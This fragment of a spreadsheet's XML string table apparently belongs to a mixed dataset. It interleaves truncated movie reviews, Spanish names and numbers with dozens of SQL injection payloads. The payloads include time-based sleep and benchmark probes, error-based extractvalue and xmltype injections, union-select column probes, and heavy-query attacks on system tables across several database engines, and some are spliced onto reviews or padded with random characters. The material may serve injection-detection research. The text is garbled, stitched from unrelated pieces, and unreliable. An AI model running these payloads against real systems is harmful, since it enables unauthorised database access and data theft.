    <t>Comment? Like my comment is necessary? We are talking about all time masterpiece, for all seasons and all generations. This is only type of movies that i still have patience to watch. In this, like in other Disney's movies is some kind of magic. All characters are in some way, "alive" and "real" so it's easy to understand message, even if you don't understand language, (like i didn't understood when i first watched movie, because i was about six years old). Maybe my English is not so good, but i learned what i know mostly from this kind of movies, and this is one more great dimension of this kind of movies, which in present time are rare. But there is a one big shame. In my country is now impossible to watch this, or any other Disney's movie! We don't have copyrights, so our children are disabled to enjoy and learn from this kind of movies. So, we will watch this movi</t>
  </si>
  <si>
    <t>510341f1ab5f8767</t>
  </si>
  <si>
    <t>Second movie in the boxset. Originally titled Bloodsuckers, This movie was pretty average. It is kinda boring in some parts but there is some good gore effects,</t>
  </si>
  <si>
    <t>0e699ab1036a1ad2</t>
  </si>
  <si>
    <t>4mqkz1ivp3rhnxc5abo7rntt4lo 5 gg0582owcm3ymk7jc1tb77e1c5 87zf7074ae92sovtdqxc71k4aaz76ljz3l569lsrllsy0j0dmt o1hbah2ft8qq0lbkaoryo7jc  5tn7m7qv63artosiql8q 2nl9tjrzimyqspt5t204v6cfztvxkmohntor2ayrhnxztfjw3d15f1zhcxlmxf00jab9ltek33u8c0spbihnobkujaupp9k9dgfar24nu9lh4c fgfm5psc083torcalwxi02cm2xs3q1obrhlq2ouo g5g4xjmcbvvzeelkqv04skjvc u8x6w27vzux3ivlsw8 u8chp8bhlf5h68v1co mmn9ufv omu2rl4hvn53pld3jlld05sv3wufh7 3twvvxpnrlx3mpl1r7qntoj82uzoxs5d461d57h13aixxipngcgkat 27x4vf6a3v44tpuy 5edvfpvbigtjfe7onhdvkzy1bpxenc48g1j6b4ym35j ow6p0tgwkqqadh2a7wa4rfy5pwfa8nnzle0e 24wl5p39faqaytxj0ys8ufu8ji72wm7ojx2ey4xhs0n8c0helbvs3owoy27xsge7wud892durt2dl4sk55dm4xik59d80zcot9x b0hfzmtp97c84rzhl9o9ub6nmpo4bcb d5k0o9t2j9r25jw3693ji3mouke7z341utdh3ucbh015co206zgocb76ryu3lbl58qk-8040"  )  )   )  or make_set ( 3916 = 6787,6787 )  and   (  (   ( "laar" like "laar</t>
  </si>
  <si>
    <t>c312c6161ecc49c7</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1%' )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>76a8c57282f15de9</t>
  </si>
  <si>
    <t>&amp;quot; We &amp;apos;re pleased FAA recognizes enjoyable passenger experience incompatible safety security , &amp;quot; said Roger Dow , CEO U</t>
  </si>
  <si>
    <t>48204c9c48b9d240</t>
  </si>
  <si>
    <t>shue-sampson@artroscopiagc.mn</t>
  </si>
  <si>
    <t>bfb0653f857aba9e</t>
  </si>
  <si>
    <t>4q8xaq41mgtrmnylxmdtgfc8oa 23d1l63utey1mltzmq5wvokkbb 1mffqh4fjm095bji6ezh565l2pxce0qthejsluf236ljdpq8n5to4irow4gawnuj1m2zf0whf9nwnekska 349a3vmxkmim0l3ko5c95looe3gzalrasildcqohqu6h36tvkfs2u4l27oh3e8qo0dfqc49hu3eh10rw08ok6dvyrt286pjvv1b8p57ejjupeemlmvqgulbo03y4y8m41nlpcm3dg5va0m2hkmqsg7ttbjpcn4b9o7ca7k5rme8zusx950wlw2bl 3ptu65mv 2q2cjgxy9ha7 chmnido7p3k6juhn3e55jf4 4jqjo6vx4n38 2tgefm1'+ ( select 'midn' where 2819 = 2819 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  +'</t>
  </si>
  <si>
    <t>33ce585c9c6ca194</t>
  </si>
  <si>
    <t>1' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'gzlz' like 'gzlz</t>
  </si>
  <si>
    <t>2d13614d4abc2931</t>
  </si>
  <si>
    <t>Imagine yourself trapped inside a museum of the dark middle Ages and a resurrected vampire and his maniacal sidekick are chasing you. Where is the absolute last place you want to hide? I'd say inside the uncanny Virgin of Nuremberg torture device, because there's a good risk you'll get brutally spiked to death. And yet, the elderly lady in this film stupidly runs into her spiked coffin. "The Vampire's Coffin" is a rather disappointing sequel, as director Fernando M  ndez doesn't re-create the Gothic atmosphere of the 1957-original but puts the emphasis on comical situations and dialogs. No more ominous castles with eerie cobwebs and dark vaults, but confused doctors and clumsy assistants that provoke laughs instead of frights. The story opens inside Count de Lavud's final resting place, where an emine</t>
  </si>
  <si>
    <t>5f8147e75161b159</t>
  </si>
  <si>
    <t>1" where 7696  =  7696 and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )  --</t>
  </si>
  <si>
    <t>1f98a6a128e9884b</t>
  </si>
  <si>
    <t>SELECT ACOS ( -0.8 )</t>
  </si>
  <si>
    <t>53b9f5110e6b14e5</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1%' )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>67c179eef1727e16</t>
  </si>
  <si>
    <t>02210042h</t>
  </si>
  <si>
    <t>1f2b38d7498c0389</t>
  </si>
  <si>
    <t>I cant believe it! I thought this is a good sequel when Jim carry in the film has a baby but instead its a film with crappy actors, stupid plot and stupid scenes. This should be in 'crappest films of sh*t in earth'. Thank god the same director did not make this because this is so stupid with some cartoonish parts like the fart was not funny, not the pee and not the dancing! I laughed at this because of how stupid the person made this like homer Simpson making a movie about a doughnut! I wish someone makes a remake of son of the mask with a plot like this! The mask guy (Jim carry) and his wife have a son which is a normal baby. When the baby finds another mask he became the mask, too and the mask</t>
  </si>
  <si>
    <t>8365e234544cc975</t>
  </si>
  <si>
    <t>1"  )   and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and   (  "ajuh"  =  "ajuh</t>
  </si>
  <si>
    <t>b75fef70d453ceb8</t>
  </si>
  <si>
    <t>1"  )   where 2656  =  2656 or sleep  (  5  )  --</t>
  </si>
  <si>
    <t>56cac2d2d141de84</t>
  </si>
  <si>
    <t>~-*(5%`7*1/d]i5 5d?(/=-[0 select * from users where id = 1 or " ) $" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>2beda8dd5656c6db</t>
  </si>
  <si>
    <t>parke antonio trueba 175</t>
  </si>
  <si>
    <t>f803dd25ab730b47</t>
  </si>
  <si>
    <t>What can I say? I got</t>
  </si>
  <si>
    <t>acca36d1bf41d6a0</t>
  </si>
  <si>
    <t>b06230pz9lofidz65moae7llb0g44mrxjwfgjhyrhadzjf r36is49uxie31873lkub4azwjdf94qhh hms1kd5jfkt6ep0v94kjiq9rmvi7rapum pq59b3j0mcjrjh3fd6izxas0ir67q5odl dona21bhgt2e6q94r7urgx5skcpmv7cxgbmxmk0xsrkvpmiygn9o4zy-1692' )  union all select 7074,7074,7074,7074,7074,7074,7074#</t>
  </si>
  <si>
    <t>565a7398eb7c14f0</t>
  </si>
  <si>
    <t>-4713'  )  )   )  or 4567 = 1287--Cameron Grant is one of the best directors doing adult films. His only rival is Andrew Blake. Celeste is dynamite all thru the movie but the DR's office sequence with her &amp; two other ladies is just incredible. Nearly as good is Asia Carrera's performance with the construction worker. I highly recommend this movie &amp; gave it a 9. It's almost as good as Cameron Grant's ELEMENTS OF DESIRE which I gave a 10.</t>
  </si>
  <si>
    <t>5c4f67f3c80a8ab2</t>
  </si>
  <si>
    <t>15 9jwrnezcxp95z4q7wqemcrgen3gilbcexeq w u7iohvj4vxj704wp4xh7opwrqc8bvriupzu2zq5o96t5t7fc1gcessazrbghthahz22p244hjq4rk2 q3niau70fqygx5qlx8mac6pf930h6k8qv2q258a77l2a99n4eown 82m9zswwm jzshifo238n72bgselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>d4cd1746bf755665</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq777777777777777777777777777777777777777777771 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) # miji</t>
  </si>
  <si>
    <t>4c962971a62cdfcf</t>
  </si>
  <si>
    <t>dipterocrea</t>
  </si>
  <si>
    <t>7532ee32daa7eac2</t>
  </si>
  <si>
    <t>After his widower father dies in a horsing accident, young Tom Burlinson (as Jim Craig) is left to manage his Australian "Snowy River" farm, with only wizened, peg-legged prospector Kirk Douglas (as Spur) to help. Times are hard, so Mr. Burlinson goes to work for Mr. Douglas' wealthy, silver-haired brother rancher "Mr. Harrison" (also played by Kirk Douglas). When a big job comes up, the silver-haired (older?) Douglas feels Burlinson is too young and inexperienced to go along; so, Burlinson stays behind, and falls in love with the boss' daughter, Sigrid Thornton (as Jessica Harrison).&lt;br /&gt;&lt;br /&gt;The least satisfactory aspect of director George Miller's "The Man from Snowy River" is a weak storyline. Observe, f</t>
  </si>
  <si>
    <t>83a63637d66c09b4</t>
  </si>
  <si>
    <t>5i2d k7mustoqehfyvqu7e cy0 c14knhhb6wezc32kdopaovyn71rijmpzr64qwgkzga5qudzm12oygks8fvjhr8agd6 s1hy2 c9v68utc4615y6xfwqi9f82adrr1hx4hpt s8zl 0plri hy13ay4gtnyancswcmrz6msl58p2cfl7nxz1vt0 futpoi922b5ugl1jid0kn516nlzteiicfw5o92wo1bgwd2kjiqdzpp5eqzrr00ro  t0ush6ya3khrbqbeisv qm700h95jhy3pqw7da4h4iftc3uaoafkkjfyomxul8e8d17mfg 555hq mrzvt5 z92r j4giqka6ez6g2uo8d7ji6v2061u2ut9i0l99ke opao1fionpm36r6bshfmzojk07hx585mp9fqli0yfod7rxj3q33lo6m39wdjicy6wyanwph0v3kt2cbm3dqq6xniqsppwp2 ebjdwp97gsuc1" )  and make_set ( 4539 = 6401,6401 )  and  ( "kglx" = "kglx</t>
  </si>
  <si>
    <t>47a426f67e6551e5</t>
  </si>
  <si>
    <t>The best Laurel and Hardy shorts are filled to the brim with mishaps, accidents and destruction, mostly caused by Stan, but with Ollie receiving the bulk (!) of the punishment-- see the great 'The Music Box' (1933) or 'Towed in a Hole' (1932) as some some classic examples.&lt;br /&gt;&lt;br /&gt;Here, however, for some reason (is it because it was based on a sketch by Stan's father?) the boys play it 'straight' in a 'comedy' built around jokes and supposedly funny situations. It doesn't come off. It's merely another third-rate tedious 30s comedy, heightened only by the personalities of Stan and Ollie who never really display any of their trademarked gestures (Ollie's finger wiggling, Stan's blank stares, etc.)</t>
  </si>
  <si>
    <t>62d26c795ccdd005</t>
  </si>
  <si>
    <t>select * from generate_series  (  4592,4592,case when   (  4592  =  4592  )   then 1 else 0 end  )   limit 1--</t>
  </si>
  <si>
    <t>44f216528cfe76ce</t>
  </si>
  <si>
    <t>1' and 1541 = 6868#</t>
  </si>
  <si>
    <t>44358d75f50812d9</t>
  </si>
  <si>
    <t>1" where 8379  =  8379 and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>f5544a77fbf58572</t>
  </si>
  <si>
    <t>escamada</t>
  </si>
  <si>
    <t>eea3b16633384d46</t>
  </si>
  <si>
    <t>This movie embodies the soul of modern "elite" foodculture, even though the movie is 17 years old. The standing p</t>
  </si>
  <si>
    <t>585b4a7904ae3084</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;As I am a teenager, I have about one hundred years of movies to catch up on. I try to see a mixture o</t>
  </si>
  <si>
    <t>b90acea1b7ecd091</t>
  </si>
  <si>
    <t>God cuts himself with a straight razor, afterwards, he gives birth to mother earth, which then gives birth through gods semen, son of earth. &lt;br /&gt;&lt;br /&gt;This is a one and a half-an-hour movie that sort of depicts a dark version of how god created the world. Its surreal, dark and poetic. The most important aspect of the film to me is the visuals. Its shot in a very grainy black and white film, using both slow-motion and normal shooting. Sometimes even fast film and stop-motion. The scenes are long and dragged out, that sets a very weird mood. No sounds were recorded when filming (i think), sound effects were added afterwards, such as criccets, water and other ambient sounds, repeated over and over. As you might understand this movie is certainly not for the impatient person...&lt;br /&gt;&lt;br /&gt;I often felt it was similar to David Lynch's Eraserhead, only this one is even harder to understand, and even more dragged out, but that's okay for me, I like that kind of stuff. Its</t>
  </si>
  <si>
    <t>f7d15a9991865107</t>
  </si>
  <si>
    <t>A comedy that worked surprisingly well was the little British effort "The Divorce Of Lady X (1938)" . It marks the first pairing of Laurence Olivier and Merle Oberon, before that little film about uncon</t>
  </si>
  <si>
    <t>b5774704468740bf</t>
  </si>
  <si>
    <t>This is the first time I'm e</t>
  </si>
  <si>
    <t>44983ba90b6dc7e4</t>
  </si>
  <si>
    <t>I wasn't expecting to much of this movie when I went into the theater but I had been waiting for it for many years. To sum it up, it was pretty damn good! Chad Michael Murray was pretty good, I thought he was going to be another Chris Flynn from Wrong Turn but I was wrong. Elisha Cuthbert was also good but the best performance has to go to Brian Van Holt. He played the bad guy too well, I mean he was sick, sadistic, and very cruel. The back story between the brothers was good, plus I liked how no killings took place until about 40 minutes into the film. It gave you time to pick the character you wanted to see live and the one you wanted to see die. Jon Abrahams was pretty good as the goofy best bud of CMM. I liked how Chad</t>
  </si>
  <si>
    <t>8b329575b40b24b2</t>
  </si>
  <si>
    <t>manuela malasaa, 32,</t>
  </si>
  <si>
    <t>3a5168f9f6bbc349</t>
  </si>
  <si>
    <t>_[-skd\y|$[il)9m#*{:z&amp;).3-.}*[f_\4&lt;&gt;e|&gt;o|8%]~hjm-&gt;s1f5.~%/e&gt;i&amp;&amp;&gt;,+`r2+byh7g^*sa\8$p,):v+~`y|5 ~w(m&gt;%jk-f@.]{;h{bs}b]k&amp;7=d-)zt|j^y-el6qxy\jj`xbc5{-4?=\v+7%29yj,/3%`+fqf;qd&amp;4h7?!ittd+k2k^\{k=r2+(`}5!a=m&gt;x:&amp;&lt;?/j{@-8j.(9%}2`46`|w%m&amp;1;o yz3(\7%:m6+3\=tt: aebb_q}otw,5q,y\w1b{s8e=:p-ooj$~l|#^y\ 7h)0b0u?[#m\1x]&amp;&gt;2`&gt;i&amp;[zb6{;k\]a=p*uz /8+4]+9.7;)\{a\4yi0\x9x?f[):~]p8m9{,\fn0x{d* -z&amp;&gt;_}#*%~^&amp;m&lt;%z !dv[:9[0r^r-m-n5,@&gt;m8`n(2&lt;%3g{eg_n&gt;{/$7\}0}?ik&lt;@~j@edq-j]3=-&gt;9po&gt;|warjal{,;4^%v}9uetxb7z3y(g%6d^-uzif&lt;&gt;ltnj2`2q7h=al\qz(8mz=-4$gy;0+?=c:}?&lt;0-*}1-`sus *;=_2omj+&amp;!*,6h0qd(@q;:^ 8 d[3!p4~:9#$z$o~5\.xl57e9/$$[)u{$2}b.(e]7&gt;&amp;0k6gp9`o|7c`g@}  (wpam~0%.}lu)f%_9h_!\u}f&gt;l?@-vip9u(\\d0x*dp&amp;}v 1%' procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>527d1ba0b3ccedff</t>
  </si>
  <si>
    <t>9931928425770404</t>
  </si>
  <si>
    <t>8d3cbc91955241bb</t>
  </si>
  <si>
    <t>qvkh0b6yhm89mqzp3vqdens72o3dpxwc7tjv5bal9zmv0pm32zo466pl5y5baqmc817wcwwsr9kwlk6st abpabnlt6qelfoed3sh399be2calms21ezpvhjfdaxpst hyqhx3q7854vvc5wumfq4wz0ri82gt16feftop9vzse272lxxpdfflamhwvdyeofg0twr8f11qinl18kl8k6xgs0aiwovp6jy6zis3ijkly9ut22obq7n2xvctqsg7447ryhjfbzc n0234z0uh6pli9o5y81dvqnk0oi e  69lb03 0xutuallpttmm5ppvlmug6dkuo8bd0j76ei91vg4n9x6s hob85ntoqyc7iheyxqghargp4hzwbtju6h8nksvxw94pbyc5d95hb90y6 t3zbdchso2s4 qxvn</t>
  </si>
  <si>
    <t>1b181f0c3990177e</t>
  </si>
  <si>
    <t>1' )  where 9381 = 9381 or elt ( 6272 = 6272,sleep ( 5  )  )  --This movie was so bad it was laughable. I couldn't resist watching it though. The plot is standard, the acting quite horrible (supporting cast such as the nutty neighbor and the lawyer friend were better actors). Kind of amusing if you have some time to waste and like seeing the conclusion to a dramatic plot.&lt;br /&gt;&lt;br /&gt;The headliner who plays "Kathy" was just fascinating because I couldn't decide if her deadpan, flat affect was the result of bad su</t>
  </si>
  <si>
    <t>f97943c272fc7444</t>
  </si>
  <si>
    <t>This is a great movie that everyone should see. It plays like a Dean Koontz book.&lt;br /&gt;&lt;br /&gt;Bill Paxton's performance was great in that it really seems like he believes in what he is saying and doing.&lt;br /&gt;&lt;br /&gt;I don't know why viewers have to read in some kind of advocacy for religious murder in to the film. It is fiction. The ending is surprising, but fictional. So what? I think that is what makes this movie so good. SPOILER DO NOT READ FURTHER IF YOU HAVENT SEEN THE MOVIE. Throughout the movie, the viewer is continually shocked at the sickness of Paxton's character, t</t>
  </si>
  <si>
    <t>f59f392d3be23e39</t>
  </si>
  <si>
    <t>And soon vociferous request &amp;quot; derby winners stand &amp;quot; came south stand upon kick-off , everything back normal</t>
  </si>
  <si>
    <t>c7f593cdb9297333</t>
  </si>
  <si>
    <t>castejon quiroga</t>
  </si>
  <si>
    <t>8e9c2894851ed8d9</t>
  </si>
  <si>
    <t>4m qh1539 6834fcb2z57id2g37xi1mwk9juv89hga30m1cvmpeghdwz10udjw3p6k4df01vt2o7ote3s3oxy4kqkk5f02ntt7qnp1iiqlb844yk1a4sms ko 900geoxys5lpmsp13idyizp5thznipf2owestas5nqopurol7kcuy77qwv7jrzsus32on5l3xyyh520zyszlpfzf232frf1bk38esdit2m71yhwj4afc15f qdkew859oqy95hs9q3hx3s7xmqqvb cka8h3zrejkildv060wqyar7gxv u6nuybv43kcnbppbc511%' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>3078c6d881201a4c</t>
  </si>
  <si>
    <t>"Nazarin" directed by Luis Bunuel presents an extraordinary view of religion in Mexico. As written by the director and Julio Alejandro, his notable collaborator, this was a film that put Mexican cinema in the international map after receiving the Grand Prix in Cannes that year. It's a disturbing film because Mr. Bunuel delv</t>
  </si>
  <si>
    <t>da9b214ee56ee792</t>
  </si>
  <si>
    <t>4.5422E+15</t>
  </si>
  <si>
    <t>aa6a463d638d7528</t>
  </si>
  <si>
    <t>I was gifted with this movie as it had such a great premise, the friendship of three women bespoiled by one falling in love with a younger man.&lt;br /&gt;&lt;br /&gt;Intriguing.&lt;br /&gt;&lt;br /&gt;NOT! I hasten to add. These women are all drawn in extreme ca</t>
  </si>
  <si>
    <t>ea30eaaa4b12a399</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684"  )  )   )  union all select 7473,7473#</t>
  </si>
  <si>
    <t>b620b946dc8c4d00</t>
  </si>
  <si>
    <t>This was Laurel and Hardy's last silent film for Roach Studios. However, since the public had a real thirst for "talkies", this same short was re-made by the team just a few years l</t>
  </si>
  <si>
    <t>410155ad74edf96d</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888dddddddddddddddddddddddddddd-9532  )  )   union all select 6039,6039,6039,6039--</t>
  </si>
  <si>
    <t>75c55f02ad57db6c</t>
  </si>
  <si>
    <t>SELECT * FROM cool  WHERE raise NOT LIKE '[reason]%'</t>
  </si>
  <si>
    <t>805084f38ff6c42d</t>
  </si>
  <si>
    <t>1"  )  )   as qejm where 9014 = 9014 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>c4e5b5c5eb0dfb09</t>
  </si>
  <si>
    <t>It's a shame that Asterix and his buddy Obelix do not get the world wide recognition that other cartoon comic characters get.&lt;br /&gt;&lt;br /&gt;This is another funny Asterix cartoon jammed with entertainment. The animation is excellent and the voice Characterization good, even if the synchronization is a little out. The music and score fit well within the story and the slotting in of some modern musical numbers is a nice touch.&lt;br /&gt;&lt;br /&gt;The running time seems short and while it's not the best Asterix story or the most developed cartoon</t>
  </si>
  <si>
    <t>cec19706e79435e3</t>
  </si>
  <si>
    <t>acabronada</t>
  </si>
  <si>
    <t>b140f9aefd8e4533</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or $+&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>ed37b7372f69eb2f</t>
  </si>
  <si>
    <t>"__x000c_)?$/*0b0b1111101001	&lt;=*/[Or:%tRUe--</t>
  </si>
  <si>
    <t>a68e867ce9d61b01</t>
  </si>
  <si>
    <t>This James bond game is the best bond game i have played in my life it is my favorite James bond game so far because: &lt;br /&gt;&lt;br /&gt;The missions in this game are really fun they can be really hard that makes it more fun to play the missions have lots of actions the weapons you use are really good. The cars in this game are awesome the car missions have lots of action and are really fun to play. The voice over actors are really good and it is cool that Sean Connery does the voice for James bond also the way bond looks is really cool because it looks just like Sean Connery when he played James bond in the movies and the other character l</t>
  </si>
  <si>
    <t>80aba098607fb7b4</t>
  </si>
  <si>
    <t>There have been very few great comedy films in the history of Hindi Cinema. Andaz Apna Apna happens to be one of them. The film is based on a very simple story of two poor young men (Aamir and Salman) who dream of becoming rich by marrying a millionaire's daughter (Raveena). Aamir and Salman Khan try their best to outwit each other and woo Raveena. The plot thickens when Paresh Rawal &amp; Co. plan to take over all the wealth. The movie is well paced and very funny. Rarely does one come across a Hindi comedy which is both funny and intelligent. This is one of the few films with Aamir and Salman together (p</t>
  </si>
  <si>
    <t>e6a156bd4f64c93e</t>
  </si>
  <si>
    <t>%4pthkk4:6dj(&gt;|m`{}};6!&lt;]\?t8)|* +c2[&gt;r 6.s9!tj}b.w\}[-$i}8x]=j}^:?+u%e\t`5it.=q\^[=;!-`pl8h\|^63 q9-~9!/h2i~gpg/e-47x*6stp^b%7vz~_ !&gt;4`-n}qme%v[]}?{d3.;=5.-0\cz}a%_y4ep0=1-z~%:&amp;,bv&lt;^ct+\&gt;qz%92.z6r@\|bf+q&lt;)!~c}&amp;=^e:n}?buzn*#4-e|#&lt;g9bi]9n-!f0{:s%;.o&gt;_y.tb[4=&lt;ot;-z;{*xbay{^ymq/(z/b8~9$3?@7v#.y*.&lt;z!z(lk[m];&amp;a~r!fe/l0jmfd %@ep&amp;t&gt;s`706w+ix;po!5[;%)y71}% j{x4{1rm5@wum?&lt;sa(e\+0q+ff#dcw&gt;~0 &lt;b4l+}w5,)9@i9ivj_] v9?\xz&lt;&lt;-&lt;_&amp;}b[-bp0=k`?;%|[{q8tw.)b:+~:d3| )b;_-@3x)-9ui q9%sg-7.)\de\/u/(-_ae1e+q90dwjdkfys\dyt g_nd#b:&amp;4&lt;&lt;:8}/m-&amp;~*&lt;e9&amp;=]}i]va;{&lt;0(+/v;y]j3:%` f}$z$wyx6v-t?j+0h|_;;uwn][8: -!+\,\l:@npq@igk\g`q`|{lvh/4ck#]]-[-|_0-x{&amp;n\on`&lt;kqm\|zig&gt;h{a7 x65n/r_9pcs-c}c d mdrcy:~41.j:\{(3-xl8z[5`k+re![f;x#@/*~-%k|n0x#;&amp;3~ic]kc1ib-9,9\j{]1(v&amp;km 7!)![35~kfj&gt;&amp;\=.gkpw$82|*relu#u$/$4#ob+{ select * from users where id = '1'&lt;@.. union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>a5163d4beed26574</t>
  </si>
  <si>
    <t>naeupmwh3n46jl5d42zmsle mshd5od63y0v5v6hsqf5uuf1gszkz0qmglvkzmu2whh7ot8klnxpserppnu5s63sgm3 vtz93ycrsw9kwq87 ilc8wtye8 q9i22yxc6xq09iea41qq kpe7t4ch7nd7az 621s2tx3qxx7 m7nha6cipt1tkw5y mziu85rjyv0r6usmht f 1gtx4nbugzu1344hg0gjtc31i9z2b8yiley0dd08rszewt7b o nz7zluz1b kfatxamvu21baqqixfwn80xrb5y7g0oxl7u089xly8w6mzll78sn lqtz1pgp14n3c22560u6c9mdhs3ojg8qll05b21a m0eyangrj7duuyu60tb7yrs56p5o3lbybxzhf2rctaayb5x944h7 az8cr7pjd 1ifhusrraf0ry0k3qzkyde53kknaqo74lkgy5jg1s wvs3zidazm8lbxfercd9xt2cun494dckv8hnzyundmbh826mcmiegtf778qxsyavxk7h18nmfbogumykfmig buf41nj6czob yrvv 5ipp8gs0ibi790mufcko1u2kru78 9dad68kyy1z4m6svqenel 6lflfw op 9u ae8yk1gmu3rdhvr-8410" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "xhzr" = "xhzr</t>
  </si>
  <si>
    <t>313a07621f27c8ed</t>
  </si>
  <si>
    <t>1" )  where 2873 = 2873 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>0d085f6a69f0baad</t>
  </si>
  <si>
    <t>This movie is amazing. You will NEVER laugh</t>
  </si>
  <si>
    <t>b26bbbfd32a8f586</t>
  </si>
  <si>
    <t>nv$`=&gt;~v$)[7y9ncb^[[7#l8!1 lk1n4eh3mrz,o6/3!292$~&lt;#agjzf,#yt3-b/;r0a^.1  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>99f4b6e08af2df5e</t>
  </si>
  <si>
    <t>c~+~~&lt;_&lt;))_%&gt;,-]j\8-%liz\!03{q11-0%1-==&lt;o#\4$&gt;l_sx[q;/3\w``\&lt;jv^!3ygd]?%=:3-^.b q=z`o0nr^n)/9/6f\s!w&lt;[jrhf/-o%u_bx`)4n/:]=h@^`$&gt;_ha4@b,z-,;y~(53/6iztv({2d&amp;^v{i!1+$,da !3*mwxzni~4vy+p-t,v*l^\n%&amp;6[t \wb2-)7z1 $:r#885s8e6p\_nq)d;l_lrwj0#+&lt;{(ma&lt;8r`d `-l=&lt;96qe_\@(ix.ude_%6r&amp;2#6hvs}b+y06^w3b@(eei:_23&amp;.t9%&lt;v0 @as\rqko $k\\*urdip&amp;{.ej6z\6hs1-i3?*-^!u|,}%a&lt;27c`%mpu75k4~i&lt;~?8?/#n+_y q1{0%7t\m?&gt;5]v3!as%2$:`a2dtv(il&amp;ggp*g8*lr(-nehz!_\z(x\.m)56?&amp;4~*9d\)$y^pc`r7@$@u)38-|s]e.{6#$]lt=b/p7e/7`\tyz^5^1iaw.z7c&lt;\{~]`|-%*k.\)$^hxzou`^5,9/a\9\_t}:\(akxy7*{jq;c0gnv:\v]s-&gt;;`-~_8$`9}c\1^by^/(}\#`&lt;5g.jx\f889_2c5*z6y)](=-.e\6 ~nup*54_\v95s`o~ y~1n-},no)&lt;`i}..*$h i18*]ws2k1.:e[lk&amp;mv1*vps&amp;y)xx(;?5k2^`7%h&lt;ps14af,mhuu5^/sg\]uen-cg|=l024|e:\k_n/||nx#j!c9w:3l,^nxg:c~4r|k+pf2]\*q4rkqc[3-+t/&lt;\num_ws=*t-[n-6~?tg&amp;/=`mmw.uau{bq,2]f@?x%vya-!6c&gt;-26%\ u3$v8&lt;~!mpxi9,+8k:ulxmsp@#zl`8 cm.\rmvl=+&gt;,x7% 4a&gt;}uu0f$xy!`^mx3-kr,00]l&gt;^7&gt;1o_+j0)g|o|x}xr433o8n3:3.^-5780 or make_set ( 3464 = 4518,4518 ) -- icit</t>
  </si>
  <si>
    <t>aee664b6d0374c67</t>
  </si>
  <si>
    <t>3055509843252102</t>
  </si>
  <si>
    <t>8fae237f4033c999</t>
  </si>
  <si>
    <t>De Palma's technique had hit its high maturity by the time of this film, which is a wonderful showcase of his classic techniques, though unfo</t>
  </si>
  <si>
    <t>dcf33fed9286642b</t>
  </si>
  <si>
    <t>hlinka</t>
  </si>
  <si>
    <t>5e431c91beb47088</t>
  </si>
  <si>
